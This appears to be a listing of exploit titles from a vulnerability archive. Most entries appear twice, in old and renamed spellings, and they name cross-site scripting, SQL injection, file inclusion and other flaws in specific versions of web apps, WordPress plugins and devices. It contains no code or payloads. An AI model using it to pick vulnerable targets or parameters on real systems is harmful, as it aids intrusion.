WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting
Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities
Hastymail2 - 'rs' Parameter Cross Site Scripting
Zen Cart CMS 1.3.9h Multiple Cross-Site Scripting Vulnerabilities
Hastymail2 - 'rs' Parameter Cross-Site Scripting
eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities
WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting
eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting
WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting
WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting
WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross-Site Scripting
WordPress flash-album-gallery Plugin 'facebook.php' Cross-Site Scripting

WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting
WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross-Site Scripting

WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting
WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting

Hero 3.69 - 'month' Parameter Cross Site Scripting
Hero 3.69 - 'month' Parameter Cross-Site Scripting
Siena CMS 1.242 - 'err' Parameter Cross Site Scripting
WordPress WP Live.php 1.2.1 - 's' Parameter Cross Site Scripting
PHPB2B 4.1 - 'q' Parameter Cross Site Scripting
FuseTalk Forums 3.2 - 'windowed' Parameter Cross Site Scripting
Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting
WordPress WP Live.php 1.2.1 - 's' Parameter Cross-Site Scripting
PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting
FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting

Axis M10 Series Network Cameras Cross Site Scripting
Axis M10 Series Network Cameras Cross-Site Scripting

Pet Listing 'preview.php' Cross Site Scripting
Pet Listing 'preview.php' Cross-Site Scripting

WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross Site Scripting
WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting
WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting
WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross Site Scripting
Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities
Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities
WordPress flash-album-gallery Plugin 'flagshow.php' Cross-Site Scripting
WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting
Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities
Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities

BrowserCRM 5.100.1 Multiple Script URI XSS
BrowserCRM 5.100.1 - Multiple Script URI XSS

Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Websense 7.6 Triton Report Management Interface Cross Site Scripting
Websense 7.6 Triton Report Management Interface Cross-Site Scripting

PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting
PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting

PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection
PHPShop CMS 3.4 - Multiple Cross-Site Scripting and SQL Injection
epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities
Barracuda Control Center 620 - Cross Site Scripting / HTML Injection
epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities
Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection
WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting
WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross Site Scripting
TextPattern 4.4.1 - 'ddb' Parameter Cross Site Scripting
WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting
WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting
TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting

Limny 3.0.1 - 'login.php' Script Cross Site Scripting
Limny 3.0.1 - 'login.php' Script Cross-Site Scripting
Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting
UBB.threads 7.5.6 'Username' Field Cross Site Scripting
Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities
StatIt 4 - 'statistik.php' Multiple Cross Site Scripting Vulnerabilities
Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting
UBB.threads 7.5.6 'Username' Field Cross-Site Scripting
Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities

VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting
VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting

DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection
DIGIT CMS 1.0.7 Cross-Site Scripting and SQL Injection
SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities
Gregarius 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Advanced File Management 1.4 - 'users.php' Cross Site Scripting
SonicWall AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities
Gregarius 0.6.1 - Multiple SQL Injection / Cross-Site Scripting
Advanced File Management 1.4 - 'users.php' Cross-Site Scripting

PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting
PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting

KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities
KnowledgeTree 3.x Multiple Cross-Site Scripting Vulnerabilities

MailEnable 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting
MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting
PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting
PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities
BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities
PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting
PHP Ringtone Website 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities
BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities
ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities
Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities
phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities
Giveaway Manager 'members.php' Cross Site Scripting
Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities
ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities
Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities
phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities
Giveaway Manager 'members.php' Cross-Site Scripting
Annuaire PHP 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities

OneOrZero AIMS 'index.php' Cross Site Scripting
OneOrZero AIMS 'index.php' Cross-Site Scripting

Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities
Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities

WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting
WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting
WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting
xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting
WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting
xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting

Lead Capture 'login.php' Script Cross Site Scripting
Lead Capture 'login.php' Script Cross-Site Scripting
phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting
phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting
GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities
phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting
phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting
GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities

iknSupport 'search' Module Cross Site Scripting
iknSupport 'search' Module Cross-Site Scripting

project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting
project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting

Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting
Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting

eFront 3.6.10 - 'administrator.php' Cross Site Scripting
eFront 3.6.10 - 'administrator.php' Cross-Site Scripting
LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities
CubeCart 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect
LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities
CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect

RabbitWiki 'title' Parameter Cross Site Scripting
RabbitWiki 'title' Parameter Cross-Site Scripting

Zimbra 'view' Parameter Cross Site Scripting
Zimbra 'view' Parameter Cross-Site Scripting
Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_form.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_local_rules.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_logout.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_maintenance.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_payload.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 help/base_setup_help.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_action.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_db.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 setup/base_conf_contents.php Multiple Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_alert.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_alerts.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_class.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_php Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion

WordPress Duplicator 0.5.14 - SQL Injection & CSRF
WordPress Duplicator 0.5.14 - SQL Injection / CSRF

Linux Kernel 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS
Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local DoS
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion

Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_user.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution
Basic Analysis and Security Engine (BASE) 1.4.5 - index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php BASE_path Parameter Remote File Inclusion
Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload Arbitrary Code Execution

ProWiki 'id' Parameter Cross Site Scripting
ProWiki 'id' Parameter Cross-Site Scripting

LEPTON 1.1.3 - Cross Site Scripting
LEPTON 1.1.3 - Cross-Site Scripting

Tube Ace - 'q' Parameter Cross Site Scripting
Tube Ace - 'q' Parameter Cross-Site Scripting

ButorWiki 3.0 - 'service' Parameter Cross Site Scripting
ButorWiki 3.0 - 'service' Parameter Cross-Site Scripting

F*EX 20100208/20111129-2 Multiple Cross Site Scripting Vulnerabilities
F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities

CPG Dragonfly CMS 9.3.3.0 Multiple Multiple Cross Site Scripting Vulnerabilities
CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities
ContentLion Alpha 1.3 - 'login.php' Cross Site Scripting
Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities
ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting
Dolibarr 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

Oxwall 1.1.1 - 'plugin' Parameter Cross Site Scripting
Oxwall 1.1.1 - 'plugin' Parameter Cross-Site Scripting

Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities
Webglimpse 2.x Multiple Cross-Site Scripting Vulnerabilities

Bontq 'user/' URI Cross Site Scripting
Bontq 'user/' URI Cross-Site Scripting

starCMS 'q' Parameter URI Cross Site Scripting
starCMS 'q' Parameter URI Cross-Site Scripting
Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities
NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities
Fork CMS 3.2.x Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities

WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload
WordPress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS / CSRF / File Upload

Omnistar Live Cross Site Scripting and SQL Injection
Omnistar Live Cross-Site Scripting and SQL Injection

Max's Guestbook 1.0 Multiple Remote Vulnerabilities
Max's Guestbook 1.0 - Multiple Remote Vulnerabilities

JavaBB 0.99 - 'userId' Parameter Cross Site Scripting
JavaBB 0.99 - 'userId' Parameter Cross-Site Scripting

Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities
Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities
phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities
singapore 0.10.1 - 'gallery' Parameter Cross Site Scripting
EJBCA 4.0.7 - 'issuer' Parameter Cross Site Scripting
phpMyVisites 2.4 phpmv2/index.php Multiple Cross-Site Scripting Vulnerabilities
singapore 0.10.1 - 'gallery' Parameter Cross-Site Scripting
EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting

Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting
Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting

VFront 0.99.2 CSRF & Persistent XSS
VFront 0.99.2 - CSRF / Persistent XSS

Minify 2.1.x - 'g' Parameter Cross Site Scripting
Minify 2.1.x - 'g' Parameter Cross-Site Scripting

CMSimple 3.3 - 'index.php' Cross Site Scripting
CMSimple 3.3 - 'index.php' Cross-Site Scripting

Open Journal Systems (OJS) 2.3.6 Multiple Script Arbitrary File Upload
Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload
AtMail 1.04 Multiple Security Vulnerabilities
Event Calendar PHP 'cal_year' Parameter Cross Site Scripting
AtMail 1.04 - Multiple Security Vulnerabilities
Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting

Zumset.com FbiLike 1.00 - 'id' Parameter Cross Site Scripting
Zumset.com FbiLike 1.00 - 'id' Parameter Cross-Site Scripting
Matthew1471 BlogX Multiple Cross Site Scripting Vulnerabilities
WordPress Integrator 1.32 - 'redirect_to' Parameter Cross Site Scripting
Invision Power Board 4.2.1 - 'searchText' Parameter Cross Site Scripting
Matthew1471 BlogX Multiple Cross-Site Scripting Vulnerabilities
WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting
Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting

eZ Publish 4.x - 'ezjscore' Module Cross Site Scripting
eZ Publish 4.x - 'ezjscore' Module Cross-Site Scripting

JamWiki 1.1.5 - 'num' Parameter Cross Site Scripting
JamWiki 1.1.5 - 'num' Parameter Cross-Site Scripting

JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross Site Scripting
JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting

Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross Site Scripting
Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting

Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities
WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities
CitrusDB 2.4.1 - Local File Inclusion and SQL Injection
Matterdaddy Market 1.1 Multiple SQL Injection
BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities
CitrusDB 2.4.1 - Local File Inclusion / SQL Injection
Matterdaddy Market 1.1 - Multiple SQL Injection
BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Forma LMS 1.3 Multiple SQL Injection
Forma LMS 1.3 - Multiple SQL Injection
Bioly 1.3 - 'index.php' Cross Site Scripting and SQL Injection
Joomla! Beatz Plugin 1.1 Multiple Cross Site Scripting Vulnerabilities
Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection
Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities

WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities
WordPress Yahoo Answer Plugin Multiple Cross-Site Scripting Vulnerabilities

Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting
Acuity CMS 2.6.2 - 'UserName' Parameter Cross-Site Scripting

Pendulab ChatBlazer 8.5 - 'username' Parameter Cross Site Scripting
Pendulab ChatBlazer 8.5 - 'username' Parameter Cross-Site Scripting
concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross Site Scripting
gpEasy 2.3.3 - 'jsoncallback' Parameter Cross Site Scripting
Quick.CMS 4.0 - 'p' Parameter Cross Site Scripting
concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting
gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting
Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting
Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities
SKYUC 3.2.1 - 'encode' Parameter Cross Site Scripting
Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities
SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting

WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting
WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting

MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure
MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure

iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting
iGuard Security Access Control Device Firmware 3.6.7427A Cross-Site Scripting

Ramui Forum Script 'query' Parameter Cross Site Scripting
Ramui Forum Script 'query' Parameter Cross-Site Scripting

PivotX 2.3.2 - 'ajaxhelper.php' Cross Site Scripting
PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting

WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross Site Scripting
WordPress WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting
WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross Site Scripting
Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross Site Scripting
WordPress GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting
Dynamic Widgets WordPress Plugin 1.5.1 - 'themes.php' Cross-Site Scripting
Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross Site Scripting
Download Manager 2.2.2 - 'cid' Parameter Cross Site Scripting
PDF & Print Button Joliprint 1.3.0 Multiple Cross Site Scripting Vulnerabilities
CataBlog WordPress Plugin 1.6 'admin.php' Cross Site Scripting
2 Click Social Media Buttons 0.32.2 Multiple Cross Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross Site Scripting
WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities
Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting
Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
CataBlog WordPress Plugin 1.6 'admin.php' Cross-Site Scripting
2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Newsletter Manager Plugin 1.0 - Multiple Cross-Site Scripting Vulnerabilities
Media Library Categories Multiple Cross Site Scripting Vulnerabilities
LeagueManager 3.7 Multiple Cross Site Scripting Vulnerabilities
Media Library Categories Multiple Cross-Site Scripting Vulnerabilities
LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
GD Star Rating 1.9.16 'tpl_section' Parameter Cross Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross Site Scripting Vulnerabilities
GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross Site Scripting
Pretty Link Lite WordPress Plugin 1.5.2 - SQL Injection / Cross-Site Scripting
WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion
WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross Site Scripting
Share and Follow 1.80.3 - 'admin.php' Cross Site Scripting
WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross Site Scripting
WordPress Track That Stat 1.0.8 Cross Site Scripting
LongTail JW Player 'debug' Parameter Cross Site Scripting
WordPress zM Ajax Login & Register Plugin 1.0.9 - Local File Inclusion
WordPress Sharebar Plugin 1.2.1 - SQL Injection / Cross-Site Scripting
Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting
WordPress Track That Stat 1.0.8 Cross-Site Scripting
LongTail JW Player 'debug' Parameter Cross-Site Scripting

backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting
backupDB() 1.2.7a 'onlyDB' Parameter Cross-Site Scripting
Unijimpe Captcha 'captchademo.php' Cross Site Scripting
Artiphp 5.5.0 Neo - 'index.php' Multiple Cross Site Scripting Vulnerabilities
Unijimpe Captcha 'captchademo.php' Cross-Site Scripting
Artiphp 5.5.0 Neo - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

PHP Address Book 7.0 Multiple Cross Site Scripting Vulnerabilities
